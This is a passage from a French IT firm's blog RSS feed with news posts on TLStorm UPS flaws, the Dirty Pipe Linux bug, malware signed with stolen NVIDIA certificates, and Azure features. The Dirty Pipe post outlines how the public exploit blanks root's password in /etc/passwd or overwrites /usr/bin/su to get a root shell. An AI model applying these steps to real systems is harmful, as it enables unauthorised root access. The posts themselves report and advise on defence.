<rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/" version="2.0">
    <channel>
        <title><![CDATA[ INSYS ]]></title>
        <description><![CDATA[ Nous créons, gérons, dépannons vos services tout cela grâce à notre expérience, nous saurons vous conseiller et diriger vers la bonne direction avec des méthodologies professionnelles. ]]></description>
        <link>https://insys.fr</link>
        <image>
            <url>https://insys.fr/favicon.png</url>
            <title>INSYS</title>
            <link>https://insys.fr</link>
        </image>
        <lastBuildDate>Sun, 19 Jul 2026 00:58:11 +0200</lastBuildDate>
        <atom:link href="https://insys.fr" rel="self" type="application/rss+xml"/>
        <ttl>60</ttl>

                <item>
                    <title><![CDATA[ Les exploits TLStorm exposent plus de 20 millions d&#x27;onduleurs UPS d&#x27;APC ]]></title>
                    <description><![CDATA[ Un ensemble de trois vulnérabilités critiques de type &quot;zero-day&quot; désormais suivies sous le nom de &quot;TLStorm&quot; pourrait permettre aux pirates de prendre le contrôle des dispositifs d&#39;alimentation sans coupure (UPS) d&#39;APC, une filiale de Schneider Electric. ]]></description>
                    <link>https://insys.fr/blog/les-exploits-tlstorm-exposent-plus-de-20-millions-donduleurs-ups-dapc/</link>
                    <guid isPermaLink="false">622a03d4884b4100609da242</guid>
                    <category><![CDATA[ Sécurité ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Thu, 10 Mar 2022 16:15:43 +0100</pubDate>
                    <media:content url="https://insys.fr/content/images/2022/03/taylor-vick-M5tzZtFCOfs-unsplash.jpg" medium="image"/>
                    <content:encoded><![CDATA[ <p>Un ensemble de trois vulnérabilités critiques de type "<strong>zero-day</strong>" désormais suivies sous le nom de "<strong>TLStorm</strong>" pourrait <strong>permettre aux pirates de prendre le contrôle des dispositifs</strong> d'alimentation sans coupure (UPS) d'APC, <strong>une filiale de Schneider Electric</strong>.</p><p>Les failles<strong> affectent les systèmes APC Smart-UPS</strong> <strong>qui sont populaires dans une variété de secteurs d'activité</strong>, y compris le gouvernement, la santé, l'industrie, l'informatique et la vente au détail.</p><figure class="kg-card kg-image-card kg-width-wide"><img src="https://insys.fr/content/images/2022/03/TLStorm-VulnSys-1.jpg" class="kg-image" alt loading="lazy" width="598" height="600"></figure><p></p><p>Les onduleurs agissent comme des <strong>solutions d'alimentation de secours d'urgence</strong> et sont <strong>présents dans des environnements critiques</strong> tels que les centres de données, les installations industrielles, les hôpitaux.</p><h2 id="risque-dimpact-physique"><br>Risque d'impact physique</h2><p>Les chercheurs d'Armis, une société fournissant des solutions de sécurité pour les appareils connectés dans les entreprises, ont découvert les trois problèmes de la famille de produits<strong> SmartConnect</strong> et <strong>Smart-UPS</strong> d'APC.</p><p>Deux des vulnérabilités, <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22805&ref=insys.fr">CVE-2022-22805</a> et <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22806&ref=insys.fr">CVE-2022-22806</a> se trouvent dans l'<strong>implémentation du protocole TLS</strong> (Transport Layer Security) qui connecte les appareils Smart-UPS avec la fonction « SmartConnect » au cloud de gestion de Schneider Electric.</p><figure class="kg-card kg-image-card kg-width-wide"><img src="https://insys.fr/content/images/2022/03/TLStormBugs-1.jpg" class="kg-image" alt loading="lazy" width="600" height="338" srcset="https://insys.fr/content/images/2022/03/TLStormBugs-1.jpg 600w"></figure><p>Le troisième, identifié comme <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0715&ref=insys.fr">CVE-2022-0715</a>, concerne le micrologiciel de "<strong>presque tous les appareils APC Smart-UPS</strong>", qui n'est pas signé cryptographiquement et son authenticité ne peut pas être vérifiée lorsqu'il est installé sur le système.</p><p>Bien que le micrologiciel soit crypté (symétrique), il lui manque une signature cryptographique, ce <strong>qui permet aux pirates d'en créer une version malveillante</strong> et de la fournir sous forme de mise à jour aux périphériques UPS cibles pour <strong>obtenir l'exécution de code à distance (RCE)</strong>.</p><p>Les chercheurs d'Armis ont pu exploiter la faille et créer une version malveillante du firmware APC qui a été acceptée par les appareils Smart-UPS comme une mise à jour officielle, un processus qui se déroule différemment selon la cible :</p><ul><li><em><strong>Les derniers appareils Smart-UPS dotés de la fonctionnalité</strong> de connexion au cloud <strong>SmartConnect </strong>peuvent être mis à niveau à partir de la console de gestion du cloud via Internet.<br></em></li><li><em><strong>Les anciens appareils Smart-UPS</strong> qui utilisent la carte de gestion réseau (<strong>NMC</strong>) peuvent être mis à jour sur le réseau local.<br></em></li><li><em><strong>La plupart des appareils Smart-UPS</strong> peuvent également être mis à niveau <strong>à l'aide d'une clé USB</strong>.</em></li></ul><p>Considérant que <strong>les onduleurs APC vulnérables sont utilisés dans environ huit entreprises sur 10</strong> - selon les données d'<a href="https://www.armis.com/research/tlstorm/?ref=insys.fr">Armis</a> - et les environnements sensibles qu'ils desservent (installations médicales, réseau ICS, salles de serveurs), <strong>les implications peuvent avoir des conséquences physiques importantes</strong>.</p><p>Les vulnérabilités liées à TLS <a href="https://www.armis.com/research/tlstorm/?ref=insys.fr">découvertes par Armis</a> semblent être plus graves car <strong>elles peuvent être exploitées par un attaquant non authentifié sans interaction de l'utilisateur</strong>, dans ce que l'on appelle une attaque "zero-click".</p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">💡</div><div class="kg-callout-text"><a href="https://www.armis.com/research/tlstorm/?ref=insys.fr">Armis Labs</a> :<br><br>"[CVE-2022-22806 et CVE-2022-22805] impliquent la connexion TLS entre l'onduleur et le cloud de Schneider Electric. Les appareils qui prennent en charge la fonction SmartConnect établissent automatiquement une connexion TLS au démarrage ou chaque fois que les connexions cloud sont temporairement perdues"</div></div><p></p><p>Les deux vulnérabilités sont causées par une mauvaise gestion des erreurs TLS dans la connexion TLS entre le Smart-UPS et le serveur Schneider Electric, et elles conduisent à l'exécution de code à distance lorsqu'elles sont correctement exploitées.</p><p>L'un des problèmes de sécurité est un contournement d'authentification causé par une "<strong>confusion d'état dans la poignée de main TLS</strong>", l'autre est un bogue de <strong>corruption de la mémoire</strong>.</p><h2 id="recommandations-datt%C3%A9nuation"><br>Recommandations d'atténuation</h2><p>Le rapport des chercheurs explique les aspects techniques des trois vulnérabilités TLStorm et fournit un ensemble de recommandations pour sécuriser les onduleurs :</p><ol><li>Installez les correctifs disponibles sur le site Web de Schneider Electric.<br><br></li><li>Si vous utilisez la NMC, changez le mot de passe NMC par défaut (« apc ») et installez un certificat SSL signé publiquement afin qu'un attaquant sur votre réseau ne puisse pas intercepter le nouveau mot de passe. Pour limiter davantage la surface d'attaque de votre NMC, reportez-vous au Manuel de sécurité de Schneider Electric pour <a href="https://www.se.com/il/en/download/document/SPD_LFLG-9VYK3D_EN/?ref=insys.fr">NMC 2</a> et <a href="https://www.se.com/il/en/download/document/SPD_CCON-BDYD7K_EN/?ref=insys.fr">NMC 3</a>.<br><br></li><li>Déployez des listes de contrôle d'accès (ACL) dans lesquelles les onduleurs ne sont autorisés à communiquer qu'avec un petit ensemble d'équipements de gestion et le Cloud Schneider Electric via des communications cryptées.</li></ol><p>Armis a également publié <a href="https://info.armis.com/rs/645-PDC-047/images/Armis-TLStorm-WP%20%281%29.pdf?ref=insys.fr">un livre blanc technique</a> avec tous les détails de la recherche.</p> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ La vulnérabilité Dirty Pipe Linux permet un accès &quot;root&quot; (CVE-2022-0847) ]]></title>
                    <description><![CDATA[ Dirty Pipe est une vulnérabilité Linux, identifiée comme CVE-2022-0847, qui peut permettre aux utilisateurs locaux d&#39;obtenir des privilèges root sur toutes les principales distributions. ]]></description>
                    <link>https://insys.fr/blog/la-vulnerabilite-dirty-pipe-linux-permet-un-acces-root/</link>
                    <guid isPermaLink="false">622776ce884b4100609da16d</guid>
                    <category><![CDATA[ Sécurité ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Tue, 08 Mar 2022 17:16:20 +0100</pubDate>
                    <media:content url="https://images.unsplash.com/photo-1549605659-32d82da3a059?crop&#x3D;entropy&amp;cs&#x3D;tinysrgb&amp;fit&#x3D;max&amp;fm&#x3D;jpg&amp;ixid&#x3D;MnwxMTc3M3wwfDF8c2VhcmNofDV8fGxpbnV4fGVufDB8fHx8MTY0Njc1NTM3MA&amp;ixlib&#x3D;rb-1.2.1&amp;q&#x3D;80&amp;w&#x3D;2000" medium="image"/>
                    <content:encoded><![CDATA[ <p>L'expert en sécurité <strong>Max Kellermann</strong> <a href="https://dirtypipe.cm4all.com/?ref=insys.fr">a découvert une faille Linux</a>, baptisée "<strong>Dirty Pipe</strong>" et suivie comme <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847&ref=insys.fr">CVE-2022-0847</a>, qui peut permettre aux utilisateurs locaux d'<strong>obtenir des privilèges root sur toutes les principales distributions</strong>.</p><p>La vulnérabilité <strong>affecte le noyau Linux 5.8 et les versions ultérieures</strong>.</p><p>La vulnérabilité <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847&ref=insys.fr">CVE-2022-0847</a> permet d'écraser des données dans des fichiers en lecture seule arbitraires, ce qui pourrait entraîner une élévation des privilèges car des processus non privilégiés peuvent injecter du code dans des processus racine.</p><p>Kellerman a expliqué que la faille est similaire à <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-5195&ref=insys.fr">CVE-2016-5195</a>, alias "<a href="https://fr.wikipedia.org/wiki/Dirty_COW?ref=insys.fr">Dirty Cow</a>", et est plus dangereuse car plus facile à exploiter.</p><p>Dans un article de blog, le chercheur a expliqué qu'<strong>il avait découvert la faille en enquêtant sur des fichiers journaux d'accès corrompus</strong> pour l'un de ses clients.</p><p>Kellerman <strong>a publié des détails techniques sur la faille</strong> <strong>Dirty Pipe</strong> ainsi qu'<strong>un exploit de preuve de concept</strong> (PoC) qui permet aux utilisateurs locaux d'écraser tout contenu de fichier dans le cache de la page, même si le fichier n'est pas autorisé à être écrit, immuable ou sur un montage en lecture seule.</p><!--kg-card-begin: markdown--><p>BleepingComputer <a href="https://www.bleepingcomputer.com/news/security/new-linux-bug-gives-root-on-all-major-distros-exploit-released/?ref=insys.fr">a rapporté</a> un tweet publié par le chercheur en sécurité <a href="https://twitter.com/phithon_xg?ref=insys.fr">Phith0n</a> qui expliquait qu'il est possible d'utiliser l'exploit pour modifier le fichier <code>/etc/passwd</code> afin de définir l'utilisateur <code>root</code> sans mot de passe. En utilisant cette astuce, un utilisateur non privilégié pourrait exécuter la commande <code>su root</code> pour accéder au compte <code>root</code>.</p>
<!--kg-card-end: markdown--><figure class="kg-card kg-embed-card"><blockquote class="twitter-tweet"><p lang="en" dir="ltr">Why did I overwrite the /etc/passwd?<br>Because this file saves all the user information on Linux.<br>I remove the &quot;x&quot; flag behind the &quot;root&quot; user, it means that I set an empty password for this user. So I can use &quot;su root&quot; to escalate privilege without credentials.</p>&mdash; Phith0n (@phithon_xg) <a href="https://twitter.com/phithon_xg/status/1500905126076157953?ref_src=twsrc%5Etfw&ref=insys.fr">March 7, 2022</a></blockquote>
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
</figure><!--kg-card-begin: markdown--><p>Le chercheur <a href="https://twitter.com/phithon_xg?ref=insys.fr">Phith0n</a> a également publié une version mise à jour de l'exploit qui permet d'obtenir des privilèges root en écrasant un programme <code>SUID</code> comme <code>./exp</code> <code>/usr/bin/su</code> pour déposer un shell <code>root</code> sur <code>/tmp/sh</code> puis en exécutant le script.</p>
<!--kg-card-end: markdown--><p>Vous trouverez ci-dessous la chronologie de cette vulnérabilité :</p><ul><li><strong>29/04/2021</strong> : premier ticket d'assistance concernant la corruption de fichiers</li><li><strong>19/02/2002</strong> : problème de corruption de fichier identifié comme bogue du noyau Linux, qui s'est avéré être une vulnérabilité exploitable</li><li><strong>20/02/2022</strong> : rapport de bogue, exploit et correctif envoyés à <a href="https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html?ref=insys.fr">l'équipe de <a href="https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html?ref=insys.fr">sécurité du noyau Linux</a></a></li><li><strong>21/02/2022</strong> : bug reproduit sur Google Pixel 6 ; rapport de bogue envoyé à l'équipe de sécurité Android</li><li><strong>21/02/2022</strong> : <a href="https://lore.kernel.org/lkml/20220221100313.1504449-1-max.kellermann@ionos.com/?ref=insys.fr">patch envoyé à LKML (sans détails de vulnérabilité)</a> comme suggéré par Linus Torvalds, Willy Tarreau et Al Viro</li><li><strong>23/02/2022</strong> : versions stables de Linux avec mon correctif de bogue (<a href="https://lore.kernel.org/stable/1645618039140207@kroah.com/?ref=insys.fr">5.16.11</a>, <a href="https://lore.kernel.org/stable/164561803311588@kroah.com/?ref=insys.fr">5.15.25</a>, <a href="https://lore.kernel.org/stable/164561802556115@kroah.com/?ref=insys.fr">5.10.102</a>)</li><li><strong>24/02/2022</strong> : <a href="https://android-review.googlesource.com/c/kernel/common/+/1998671?ref=insys.fr">Google fusionne le correctif de bogue dans le noyau Android</a></li><li><strong>28/02/2022</strong> : a notifié la liste de diffusion <a href="https://oss-security.openwall.org/wiki/mailing-lists/distros?ref=insys.fr#how-to-use-the-lists">linux-distros</a></li><li><strong>07/03/2022</strong> : divulgation publique</li></ul><p>Les serveurs exécutant des versions de noyau obsolètes sont exposés à des attaques exploitant cette faille.</p> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ Des certificats NVIDIA utilisés pour déployer des logiciels malveillants ]]></title>
                    <description><![CDATA[ Les cybercriminels utilisent des certificats de signature de code NVIDIA volés pour signer les logiciels malveillants afin qu&#39;ils paraissent dignes de confiance et permettent le chargement de pilotes malveillants dans Windows. ]]></description>
                    <link>https://insys.fr/blog/des-certificats-nvidia-utilises-pour-deployer-des-logiciels-malveillants/</link>
                    <guid isPermaLink="false">62260ae2884b4100609da0d7</guid>
                    <category><![CDATA[ Sécurité ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Mon, 07 Mar 2022 16:00:06 +0100</pubDate>
                    <media:content url="https://images.unsplash.com/photo-1509479200622-4503f27f12ef?crop&#x3D;entropy&amp;cs&#x3D;tinysrgb&amp;fit&#x3D;max&amp;fm&#x3D;jpg&amp;ixid&#x3D;MnwxMTc3M3wwfDF8c2VhcmNofDE3fHxoYWNrZXJ8ZW58MHx8fHwxNjQ2NjY0NjEy&amp;ixlib&#x3D;rb-1.2.1&amp;q&#x3D;80&amp;w&#x3D;2000" medium="image"/>
                    <content:encoded><![CDATA[ <p>Les cybercriminels utilisent des certificats de signature de code NVIDIA volés pour signer des logiciels malveillants afin qu'ils paraissent dignes de confiance et permettent de charger des pilotes malveillants dans Windows.</p><p>Récemment, <strong>NVIDIA a confirmé avoir été victime d'une cyberattaque</strong> qui a permis à des acteurs de la menace de voler des informations d'identification d'employés et des données exclusives.</p><p>Le groupe d'extorsion, connu sous le nom de "<strong>Lapsus$</strong>", déclare <strong>avoir volé 1 To de données au cours de l'attaque</strong> et <strong>avoir commencé à divulguer ces données en ligne après que NVIDIA ait refusé de négocier avec eux</strong>.</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://insys.fr/content/images/2022/03/nvidia-telegram.jpg" class="kg-image" alt loading="lazy" width="1366" height="819" srcset="https://insys.fr/content/images/size/w600/2022/03/nvidia-telegram.jpg 600w, https://insys.fr/content/images/size/w1000/2022/03/nvidia-telegram.jpg 1000w, https://insys.fr/content/images/2022/03/nvidia-telegram.jpg 1366w" sizes="(min-width: 1200px) 1200px"><figcaption>Messages de <strong>Lapsus$</strong> à propos de l'attaque de NVIDIA</figcaption></figure><p>La fuite comprend deux certificats de signature de code volés utilisés par les développeurs de NVIDIA pour signer leurs pilotes et leurs exécutables.</p><figure class="kg-card kg-embed-card"><blockquote class="twitter-tweet"><p lang="en" dir="ltr">As part of the <a href="https://twitter.com/hashtag/NvidiaLeaks?src=hash&ref_src=twsrc%5Etfw&ref=insys.fr">#NvidiaLeaks</a>, two code signing certificates have been compromised. Although they have expired, Windows still allows them to be used for driver signing purposes. See the talk I gave at BH/DC for more context on leaked certificates:  <a href="https://t.co/UWu3AzHc66?ref=insys.fr">https://t.co/UWu3AzHc66</a> <a href="https://t.co/gCrol0BxHd?ref=insys.fr">pic.twitter.com/gCrol0BxHd</a></p>&mdash; Bill Demirkapi (@BillDemirkapi) <a href="https://twitter.com/BillDemirkapi/status/1499437244830175236?ref_src=twsrc%5Etfw&ref=insys.fr">March 3, 2022</a></blockquote>
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
</figure><p><strong>Un certificat de signature de code</strong> permet aux développeurs de signer numériquement les exécutables et les pilotes afin que Windows et les utilisateurs finaux puissent <strong>vérifier le propriétaire du fichier et s'assurer qu'il n'a pas été altéré par un tiers</strong>.</p><p>Pour renforcer la sécurité de Windows, Microsoft exige également que les pilotes en mode noyau soient signés avant que le système d'exploitation ne les charge.</p><h2 id="des-certificats-nvidia-utilis%C3%A9s-pour-signer-des-logiciels-malveillants"><br>Des certificats NVIDIA utilisés pour signer des logiciels malveillants</h2><p>Après que Lapsus$ ait divulgué les certificats de signature de code de NVIDIA, <a href="https://twitter.com/cyb3rops/status/1499514240008437762?ref=insys.fr"><a href="https://twitter.com/cyb3rops/status/1499514240008437762?ref=insys.fr">les chercheurs en sécurité ont rapidement découver</a>t</a> que les certificats étaient utilisés pour signer des logiciels malveillants et d'autres outils utilisés par les cybercriminels.</p><p>Selon les échantillons téléchargés sur le service d'analyse des logiciels malveillants VirusTotal, les certificats volés ont été utilisés pour signer divers logiciels malveillants et outils de piratage, tels que des balises Cobalt Strike, Mimikatz, des portes dérobées et des chevaux de Troie d'accès à distance.</p><p>Par exemple, un cybercriminel a utilisé le certificat pour signer un cheval de Troie d'accès à distance Quasar [<a href="https://www.virustotal.com/gui/file/065077fa74c211adf9563f00e57b5daf9594e72cea15b1c470d41b756c3b87e1?ref=insys.fr">VirusTotal</a>], tandis qu'un autre a utilisé le certificat pour signer un pilote Windows [<a href="https://www.virustotal.com/gui/file/2f578cb0d97498b3482876c2f356035e3365e2c492e10513ff4e4159eebc44b8/detection?ref=insys.fr">VirusTotal</a>].</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://insys.fr/content/images/2022/03/quasar-trojan.jpg" class="kg-image" alt loading="lazy" width="655" height="884" srcset="https://insys.fr/content/images/size/w600/2022/03/quasar-trojan.jpg 600w, https://insys.fr/content/images/2022/03/quasar-trojan.jpg 655w"><figcaption>Quasar RAT signé par un certificat NVIDIA</figcaption></figure><p>Les chercheurs en sécurité <a href="https://twitter.com/GossiTheDog?ref=insys.fr">Kevin Beaumont</a> et <a href="https://twitter.com/wdormann?ref=insys.fr">Will Dormann</a> ont indiqué que les certificats volés utilisent les numéros de série suivants :</p><!--kg-card-begin: markdown--><pre><code>43BB437D609866286DD839E1D00309F5
14781bc862e8dc503a559346f5dcc518
</code></pre>
<!--kg-card-end: markdown--><p></p><p>Certains de ces fichiers ont probablement été téléchargés sur VirusTotal par des chercheurs en sécurité, mais d'autres semblent être utilisés par des acteurs de la menace pour des campagnes de malware [<a href="https://www.virustotal.com/gui/file/a0aa66f6639e2b54a908115571c85285598845d3e52888fe27c6b35f6900fe56/detection?ref=insys.fr">1</a>, <a href="https://www.virustotal.com/gui/file/a7c3ce181e5c3956bb6b9b92e862b6fea6d6d3be1a38321ebb84428dde127677/relations?ref=insys.fr">2</a>].</p><p>Bien que les deux certificats NVIDIA volés aient expiré, Windows autorise toujours le chargement dans le système d'exploitation d'un pilote signé avec ces certificats.</p><p>Par conséquent, en utilisant ces certificats volés, les acteurs de la menace ont l'avantage de faire passer leurs programmes pour des programmes NVIDIA légitimes et de permettre aux pilotes malveillants d'être chargés par Windows.</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://insys.fr/content/images/2022/03/signed-malware.jpg" class="kg-image" alt loading="lazy" width="536" height="642"><figcaption>Echantillon signé du RAT Quasar</figcaption></figure><p>Pour empêcher les pilotes vulnérables connus d'être chargés dans Windows, David Weston, directeur de la sécurité des entreprises et des systèmes d'exploitation chez Microsoft, a indiqué sur Twitter que les administrateurs peuvent configurer les politiques de contrôle des applications de <a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/select-types-of-rules-to-create?ref=insys.fr">Windows Defender pour contrôler</a> quels pilotes NVIDIA peuvent être chargés.</p><figure class="kg-card kg-embed-card"><blockquote class="twitter-tweet"><p lang="en" dir="ltr">WDAC policies work on both 10-11 with no hardware requirements down to the home SKU despite some FUD misinformation i have seen so it should be your first choice.  Create a policy with the Wizard and then add a deny rule or allow specific versions of Nvidia if you need</p>&mdash; David Weston (DWIZZZLE) (@dwizzzleMSFT) <a href="https://twitter.com/dwizzzleMSFT/status/1499527802382471188?ref_src=twsrc%5Etfw&ref=insys.fr">March 3, 2022</a></blockquote>
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
</figure><p>Cependant, l'utilisation de WDAC n'est pas une tâche facile, surtout pour les utilisateurs de Windows non informaticiens.</p><p>En raison du risque d'abus, on espère que les certificats volés seront ajoutés à la liste de révocation des certificats de Microsoft à l'avenir pour empêcher les pilotes malveillants de se charger dans Windows.</p><p>Cependant, cela entraînerait le blocage des pilotes NVIDIA légitimes, ce qui ne devrait pas se produire de sitôt.</p> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ Microsoft Defender for Cloud peut désormais protéger Google Cloud ]]></title>
                    <description><![CDATA[ Microsoft a annoncé récemment que Microsoft Defender pour le cloud est désormais également doté d&#39;une protection native pour les environnements Google Cloud Platform (GCP), fournissant des recommandations de sécurité et la détection des menaces dans les clouds. ]]></description>
                    <link>https://insys.fr/blog/microsoft-defender-for-cloud-peut-desormais-proteger-google-cloud/</link>
                    <guid isPermaLink="false">6218ee1af174af00629c7f12</guid>
                    <category><![CDATA[ Azure ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Fri, 25 Feb 2022 16:27:42 +0100</pubDate>
                    <media:content url="https://insys.fr/content/images/2022/02/GoogleCloudSecurity.jpg" medium="image"/>
                    <content:encoded><![CDATA[ <p>Microsoft a annoncé récemment que "<a href="https://azure.microsoft.com/fr-fr/services/defender-for-cloud/?ref=insys.fr">Microsoft Defender for Cloud</a>" est désormais également doté d'une protection native pour les environnements Google Cloud Platform (GCP), fournissant des recommandations de sécurité et la détection des menaces dans les clouds.</p><p><a href="https://azure.microsoft.com/fr-fr/services/defender-for-cloud/?ref=insys.fr">Defender for Cloud</a> (anciennement <strong>Azure Security Center</strong> et <strong>Azure Defender</strong>) est une solution de sécurité qui surveille les services cloud pour détecter les menaces, formule des recommandations pour renforcer la sécurité, et détecte et avertit des vulnérabilités dans les environnements multi-cloud et hybrides protégés.</p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">?</div><div class="kg-callout-text"><strong>Gilad Elyashar</strong> (responsable du programme du groupe de partenaires Microsoft) a déclaré :<br><br><em>"Aujourd'hui, nous sommes ravis d'annoncer que <strong>Microsoft Defender pour le cloud prend désormais en charge Google Cloud Platform (GCP)</strong> avec ses fonctionnalités CSPM et CWP natives, sans aucune dépendance vis-à-vis des outils tiers de Google".</em><br><br><em>"La prise en charge de GCP s'accompagne d'une expérience d'intégration simplifiée, de plus de 80 recommandations prêtes à l'emploi pour renforcer votre environnement, et bien plus encore.".</em></div></div><p></p><p>La prise en charge de GCP par Defender for Cloud <strong>est fournie avec des suggestions prêtes à l'emploi qui simplifient la configuration des environnements GCP conformément aux normes de sécurité telles que les références du Center for Internet Security (CIS)</strong>, la protection des charges de travail critiques exécutées sur GCP, etc.</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://insys.fr/content/images/2022/02/protect-cloud.png" class="kg-image" alt loading="lazy" width="2000" height="1076" srcset="https://insys.fr/content/images/size/w600/2022/02/protect-cloud.png 600w, https://insys.fr/content/images/size/w1000/2022/02/protect-cloud.png 1000w, https://insys.fr/content/images/size/w1600/2022/02/protect-cloud.png 1600w, https://insys.fr/content/images/size/w2400/2022/02/protect-cloud.png 2400w" sizes="(min-width: 1200px) 1200px"><figcaption>Microsoft Defender for Cloud</figcaption></figure><p></p><p>En novembre, Microsoft a également <a href="https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/ignite-2021-microsoft-defender-for-cloud-news/ba-p/2882807?ref=insys.fr">annoncé la prise en charge native multi-cloud CSPM d'AWS</a> lors de la conférence Ignite 2021, avec une intégration facile en connectant le compte principal AWS.</p><p>Cela a étendu les capacités de protection des conteneurs Microsoft Defender for Cloud pour prendre en charge les clusters Amazon EKS Kubernetes et les capacités Defender for Server vers AWS EC2.</p><p>Après l'intégration d'AWS et de GCP, les équipes de sécurité <strong>peuvent désormais obtenir un aperçu de l'état de sécurité de l'environnement multi-cloud</strong> de leur organisation, Azure, Amazon Web Services (AWS) et Google Cloud Platform (GCP), <strong>à partir d'un seul endroit, sur le Defender pour la page d'inventaire des ressources du portail Cloud</strong>.</p><p>Vous pouvez trouver plus d'informations sur la façon de connecter vos comptes GCP sur <a href="https://docs.microsoft.com/fr-fr/azure/defender-for-cloud/quickstart-onboard-gcp?pivots=env-settings&ref=insys.fr">le site Web d'assistance de Microsoft</a>. Les capacités d'intégration automatique de Defender for Cloud connecteront toutes les instances de calcul existantes et nouvelles dans votre environnement.</p><p></p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">?</div><div class="kg-callout-text"><strong>Vasu Jakkal</strong> (Vice-président de la sécurité, de la conformité et de l'identité de Microsoft) a déclaré :<br><br><em>"Grâce à la prise en charge de GCP, <strong>Microsoft est désormais le seul fournisseur de cloud à offrir une protection multicloud native pour les trois principales plates-formes du secteur</strong> : Microsoft Azure et Amazon Web Services (AWS) (annoncés à Ignite en novembre dernier), et désormais GCP".</em></div></div> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ Microsoft annonce le &quot;hotpatching&quot; pour les machines virtuelles Windows Server Azure ]]></title>
                    <description><![CDATA[ Microsoft a annoncé la disponibilité générale du hotpatching pour les machines virtuelles de Windows Server Azure Edition, permettant la mise à jour sans redémarrage du serveur. ]]></description>
                    <link>https://insys.fr/blog/microsoft-annonce-le-hotpatching-pour-les-machines-virtuelles-windows-server-azure/</link>
                    <guid isPermaLink="false">6212ea02ba827c0062340422</guid>
                    <category><![CDATA[ Azure ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Mon, 21 Feb 2022 11:00:00 +0100</pubDate>
                    <media:content url="https://insys.fr/content/images/2022/02/maxresdefault.jpg" medium="image"/>
                    <content:encoded><![CDATA[ <p>Microsoft a annoncé la disponibilité générale du "<strong><a href="https://docs.microsoft.com/fr-fr/azure/automanage/automanage-hotpatch?ref=insys.fr#how-hotpatch-works">hotpatching</a> - mise à jour à chaud</strong>" pour les machines virtuelles  "<a href="https://docs.microsoft.com/en-us/windows-server/get-started/editions-comparison-windows-server-2022?ref=insys.fr"><strong>Windows Server Azure Edition</strong></a>", permettant aux administrateurs d'<strong>installer les mises à jour de sécurité Windows</strong> sur les machines virtuelles prises en charge <strong>sans nécessiter de redémarrage du serveur.</strong></p><p>La fonctionnalité fonctionne avec <strong>les machines virtuelles Azure</strong> nouvellement déployées exécutant <strong>Windows Server 2022 Datacenter - "<a href="https://docs.microsoft.com/fr-fr/azure/virtual-machines/generation-2?ref=insys.fr">Azure Edition Core Gen2</a>"</strong> et est disponible dans toutes les régions Azure du monde.</p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">?</div><div class="kg-callout-text"><strong>Ned Pyle</strong> (responsable de programme principal au sein du groupe d'ingénierie Microsoft Windows Server) à déclaré :<br><br><em>"Le hotpatching est une nouvelle façon d'installer des mises à jour sur une machine virtuelle Windows Server 2022 Datacenter : Azure Edition (Core) qui ne nécessite pas de redémarrage après l'installation, en corrigeant le code en mémoire des processus en cours d'exécution sans avoir à redémarrer le processus".</em><br><br><em>"Le hotpatching couvre les mises à jour de sécurité Windows et maintient la parité avec le contenu des mises à jour de sécurité publiées dans le canal de mise à jour Windows régulier (non-Hotpatch). Le hotpatching fonctionne en établissant d'abord une base de référence avec une dernière mise à jour cumulative de Windows Update."</em></div></div><h2 id="quels-sont-les-avantages"><br>Quels sont les avantages ?</h2><p>Les avantages de l'utilisation du hotpatching pour maintenir vos machines virtuelles Azure Windows Server 2022 à jour et sécurisées incluent :</p><ul><li><em>Disponibilité accrue avec <strong>moins de redémarrages</strong></em></li><li><em><strong>Déploiement plus rapide des mises à jour</strong> car les packages sont plus petits, s'installent plus rapidement et ont <strong>une orchestration des correctifs plus facile avec Azure Update Manager</strong></em></li><li><em><strong>Meilleure protection</strong>, car les packages Hotpatch s'installent plus rapidement <strong>sans qu'il soit nécessaire de planifier un redémarrage</strong>, ce qui <strong>réduit la "fenêtre de vulnérabilité"</strong> après la publication d'une mise à jour de sécurité Windows</em></li></ul><h2 id="une-fonctionnalit%C3%A9-actuellement-r%C3%A9serv%C3%A9e-%C3%A0-microsoft-azure"><br>Une fonctionnalité actuellement réservée à Microsoft Azure</h2><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">?️</div><div class="kg-callout-text"><strong>Ned Pyle</strong> à déclaré<strong> sur Twitter</strong> : <br><br><em>"Il ne sera pas disponible dans AWS avant un certain temps, désolé. Cette fonctionnalité est actuellement 